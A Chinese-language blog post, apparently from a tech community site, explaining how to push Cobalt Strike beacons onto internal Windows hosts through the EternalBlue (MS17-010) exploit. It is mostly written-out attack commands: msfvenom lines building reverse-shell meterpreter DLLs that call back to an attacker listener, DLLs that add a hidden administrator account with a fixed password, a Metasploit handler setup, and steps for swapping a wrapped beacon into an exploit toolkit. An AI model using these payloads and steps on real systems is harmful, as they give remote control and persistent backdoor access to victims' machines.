永恒之蓝上线CS

简介: 该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。

永恒之蓝上线CS

内网有时候没办法了,有入口,但是处于一种尴尬的区域,需要扩大成果,眼前也只有几台永恒之蓝可以打了,没办法了,但是MSF又不太适合维持权限,于是想办法永恒之蓝上线CS。

前提要求:

1.目标机子出网

2.没有开启防火墙、杀软之类

3.存在永恒之蓝

Erebus插件

Erebus→pwn→eterblue

永恒之蓝上线CS

内网有时候没办法了,有入口,但是处于一种尴尬的区域,需要扩大成果,眼前也只有几台永恒之蓝可以打了,没办法了,但是MSF又不太适合维持权限,于是想办法永恒之蓝上线CS。

前提要求:

1.目标机子出网

2.没有开启防火墙、杀软之类

3.存在永恒之蓝

Erebus插件

Erebus→pwn→eterblue

image.png

image.png

tips

msf生成dll常见的命令

x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=5555 -f dll >x64.dll

x86

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll >xxx.dll

生成 x86的命令执行dll

msfvenom -p windows/exec cmd="net user qaxnb$ Qaxnb123. /add" exitfunc=process -a x86 -f dll > x86.dll

msfvenom -p windows/exec cmd="net localgroup administrators qaxnb$ /add" exitfunc=process -a x86 -f dll > x861.dll

生成x64命令执行dll

msfvenom -p windows/x64/exec cmd="net user qaxnb$ Qaxnb123. /add" exitfunc=process -a x64 -f dll > x64.dll

msf的监听

# use exploit/multi/handler

# set payload windows/x64/meterpreter/reverse_tcp

# set lhost 192.168.1.116

# set lport 5555

# exploit

永恒之蓝上线cs操作:

根据版本选择系统位数的raw

image.png

生成的payload.bin文件

image.png

然后利用msf生成对应的dll文件

要注意

64位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
32位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -f dll -o x86.dll

生成的x64.dll文件

image.png

替换掉ZombieBoyTools中的x64.dll文件

image.png

Eternablue注意箭头的操作,如果出现win了,就没问题了。

image.png

Double中选好ip和系统位数然后点击Attack

image.png

CS成功上线

image.png

目录
相关文章
|
8月前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
473 1
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
1230 5
ms17-010(永恒之蓝)漏洞复现
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
156 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
474 0
|
安全 网络协议 网络安全
永恒之蓝Windows10版踩坑复现
永恒之蓝Windows10版踩坑复现
1261 0
|
网络协议 安全
干货|不出网上线CS的各种姿势(三)
干货|不出网上线CS的各种姿势
368 0
|
C语言
让人心驰神往的CS专业,真相竟然是……
大家好,我是小熊(xiong)妹,现在在读大一,恩,传说中毕业就能年薪百万的计算机专业。 如果你问我,计算机学生一周中最重要的是什么,我会毫不犹豫地回答:最重要的当然是保住头发啦~
157 0
让人心驰神往的CS专业,真相竟然是……
|
安全 测试技术 网络安全
微软EternalBlue永恒之蓝漏洞攻击测试
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256 声明:仅供学习交流使用,个人实验笔记。
1667 0
"蓝姐姐"发布 构建素质教育服务新生态
本文讲的是蓝姐姐发布 构建素质教育服务新生态,12月18日,以“爱﹒联结”为主题的星空创联“蓝姐姐”素质教育服务平台上线发布会,在北京创业大街黑马会全球路演中心举行。“蓝姐姐”精选服务平台在发布会上亮相,小海豚、VIP kid、童子军户外、Kiddie Fun、糖果在线等入驻战略合作机构进行现场签约仪式,知名教育品牌强强联合,有望构建素质教育的新生态。
1414 0

热门文章

最新文章

下一篇
开通oss服务